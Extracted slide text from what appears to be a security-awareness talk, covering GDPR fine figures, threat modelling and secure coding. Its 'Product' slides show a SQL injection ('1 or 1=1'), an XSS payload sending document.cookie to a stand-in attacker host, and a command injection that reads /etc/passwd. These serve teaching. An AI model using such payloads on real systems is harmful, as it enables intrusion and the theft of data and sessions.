The document discusses securing systems by focusing on people, processes, and products. For people, it recommends making security easy and monitoring for security events. For processes, it suggests analyzing misuse cases, threat modeling using STRIDE, and formalizing procedures. For products, it advises getting trained, using proper APIs and tools, testing systems, and addressing vulnerabilities like SQL injection. The overall aim is to secure systems through a balanced approach across people, processes, and technology.
12. Impact of not taking care has changed a bit
*In dutch: Algemene verordening gegevensbescherming (AVG)
13. Impact of not taking care has changed a bit
*In dutch: Algemene verordening gegevensbescherming (AVG)
ING Bank (2017)
~ 680 Million
Alphabet (Google)
~ 4.4 Billion (2017)
Microsoft (2017)
~ 3.6 Billion
Rabobank (2017)
~ 104 Million
Facebook (2017)
~ 1.6 Billion
65. Product
1234
SELECT accountNumber, balance FROM accounts
WHERE account_owner_id = 1234
1%20or%201%2f1
SELECT accountNumber, balance FROM accounts
WHERE account_owner_id = 1 or 1=1
67. Product
SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1 or 1=1
SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1234
68. Product
SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1 or 1=1
<H1>Hi Rolf</H1>
<H1>Hi <script>window.location="http://some_attacker/cookie.cgi?steal=" +escape(document.cookie)</script> </H1>
SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1234
69. Product
SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1 or 1=1
<H1>Hi Rolf</H1>
$ rm tempfile;id;cat /etc/passwd
$ rm tempfile
<H1>Hi <script>window.location="http://some_attacker/cookie.cgi?steal=" +escape(document.cookie)</script> </H1>
SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 1234
91. Summary
People
• Make it easy to
be safe
• Security event
monitoring
• …
Process
• Misuse cases
• Threat modeling
• STRIDE
• …
Product
92. Summary
People
• Make it easy to be
safe
• Security event
monitoring
• …
Process
• Misuse cases
• Threat modeling
• STRIDE
• …
Product
• Get Trained
• Use the correct
API’s and tools
• Have things tested
• …